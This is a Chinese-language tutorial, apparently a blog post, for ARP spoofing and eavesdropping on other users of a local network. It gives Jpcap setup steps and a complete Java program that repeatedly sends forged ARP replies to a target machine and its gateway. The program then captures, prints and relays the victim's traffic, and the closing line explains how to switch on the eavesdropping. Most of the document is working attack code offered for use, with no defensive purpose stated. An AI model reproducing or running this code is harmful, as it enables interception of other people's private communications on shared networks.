ARP欺骗在局域网内拦截和窃听他人通讯
使用jpcap。下载链接为http://pan.baidu.com/s/1jG5wLHs。内含对应的jar和dll。
配置方法:
在windows 64位中(amd 和英特尔均可),下载jpcap安装包。需要提前安装winpcap。
配置Jpcap路径:这一步也是最重要的一步。具体路径为,把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\Program Files\Java\jre1.6.0_07\bin"文件夹里面(复制到你机器JRE文件夹放到bin文件夹里面就可以了,其中JRE的版本一定要与Eclipse配置的版本一致),再把Jpcap文件夹下lib文件夹里的Jpcap.jar复制到"C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里面(复制到你机器JRE文件夹->lib->ext放到ext文件夹里面就可以了)。
然后配置Eclipse的JRE环境,(一定需要),选择Window->preferences->Java->Installed JREs,在Installed JREs选择框中选择相应的JRE版本,点Edit,选择Add External JARs…,选择你的Jpcap.jar包("C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里),在Finish就配置全部完成了;
在eclipse中代码如下
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;
import jpcap.packet.IPPacket;
import jpcap.packet.Packet;
import jpcap.packet.TCPPacket;
public class ChangeARP {
private NetworkInterface[] devices;
private NetworkInterface device;
private JpcapCaptor jpcap;
private JpcapSender sender;
private ARPPacket arpTarget,arpGate;
private byte[] targetMAC,gateMAC;
private String targetIP,gateIP;
private void getDevice() throws IOException{
devices = JpcapCaptor.getDeviceList();
//may not have only one devices
device = devices[0];
jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000);
jpcap.setFilter("ip", true);
sender = jpcap.getJpcapSenderInstance();
}
public ChangeARP(byte[] targetMAC,String targetIP,byte[] gateMAC,String gateIP)
throws UnknownHostException,InterruptedException{
//may be buggy
this.targetMAC = targetMAC;
this.targetIP = targetIP;
this.gateMAC = gateMAC;
this.gateIP = gateIP;
try{
getDevice();
}catch(IOException e){
}
///////////////////////////////////////////////////////
//以下程序用于构建欺骗目标的arp包,使用自己的mac地址,冒充他人ip
//
//
//////////////////////////////////////////////////////
////////////////////建立ARP包///////////////////////////////
arpTarget = new ARPPacket();
//以太网类型
arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;
//ip类型
arpTarget.prototype = ARPPacket.PROTOTYPE_IP;
//relay类型
arpTarget.operation = ARPPacket.ARP_REPLY;
//mac地址为6个字节
arpTarget.hlen = 6;
//ip地址为4个字节
arpTarget.plen = 4;
arpTarget.sender_hardaddr = device.mac_address;
arpTarget.sender_protoaddr = InetAddress.getByName(gateIP).getAddress();
arpTarget.target_hardaddr = targetMAC;
arpTarget.target_protoaddr = InetAddress.getByName(targetIP).getAddress();
//////////////////////建立以太网包////////////////////////////////////
EthernetPacket ethToTarget = new EthernetPacket();
ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;
ethToTarget.src_mac = device.mac_address;
ethToTarget.dst_mac = targetMAC;
arpTarget.datalink = ethToTarget;
///////////////////////////////////////////////////////
//以下程序用于构建欺骗网关的arp包
//
//
//////////////////////////////////////////////////////
arpGate = new ARPPacket();
arpGate.hardtype = ARPPacket.HARDTYPE_ETHER;
arpGate.prototype = ARPPacket.PROTOTYPE_IP;
arpGate.operation = ARPPacket.ARP_REPLY;
arpGate.hlen = 6;
arpGate.plen = 4;
arpGate.sender_hardaddr = device.mac_address;
arpGate.sender_protoaddr = InetAddress.getByName(targetIP).getAddress();
arpGate.target_hardaddr = gateMAC;
arpGate.target_protoaddr = InetAddress.getByName(gateIP).getAddress();
EthernetPacket ethToGate = new EthernetPacket();
ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP;
ethToGate.src_mac = device.mac_address; // A的MAC地址
ethToGate.dst_mac = gateMAC; // 网关的MAC地址
arpGate.datalink = ethToGate;
System.out.println(arpTarget);
System.out.println(arpGate);
///////////////////////////////////////////////////////
//发射线程
//
//
//////////////////////////////////////////////////////
new Thread(new Runnable() {
public void run() {
while (true) {
sender.sendPacket(arpTarget);
sender.sendPacket(arpGate);
System.out.println("hahahahaahah");
try {
Thread.sleep(500);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
}
}).start();
//recP();//接收数据并转发
}
///////////////////////////////////////////////////////
//用于转发数据
//
//
//////////////////////////////////////////////////////
public void recP(){
IPPacket ipPacket = null;
while(true){
ipPacket = (IPPacket)jpcap.getPacket();
if(ipPacket == null)
continue;
if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
System.out.println(ipPacket);
System.out.println(new String(ipPacket.data));
}
if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
send(ipPacket,gateMAC);
}else{
send(ipPacket,targetMAC);
}
}
}
///////////////////////////////////////////////////////
//用于发射
//
//
//////////////////////////////////////////////////////
private void send(Packet packet,byte[] changeMac){
EthernetPacket eth;
if(packet.datalink instanceof EthernetPacket){
eth = (EthernetPacket)packet.datalink;
for(int i=0;i<6;i++){
eth.dst_mac[i]=changeMac[i];
eth.src_mac[i]=device.mac_address[i];
}
sender.sendPacket(packet);
}
}
public static void main(String[] args)throws Exception{
byte[] targetMAC = new byte[6];
targetMAC[0] = (byte) 0x6c;
targetMAC[1] = (byte) 0x62;
targetMAC[2] = (byte) 0x6d;
targetMAC[3] = (byte) 0x3c;
targetMAC[4] = (byte) 0xab;
targetMAC[5] = (byte) 0x77;
byte[] gateMAC = new byte[6];
gateMAC[0] = (byte) 0x68;
gateMAC[1] = (byte) 0xbd;
gateMAC[2] = (byte) 0xab;
gateMAC[3] = (byte) 0x33;
gateMAC[4] = (byte) 0xff;
gateMAC[5] = (byte) 0x80;
String targetIP = "192.168.48.14";
String gateIP = "192.168.48.1";
System.out.println(System.getProperty("java.library.path"));
ChangeARP temp = new ChangeARP(targetMAC,targetIP,gateMAC,gateIP);
}
}
如果要监听对方通信,请将recp前的注释取消掉。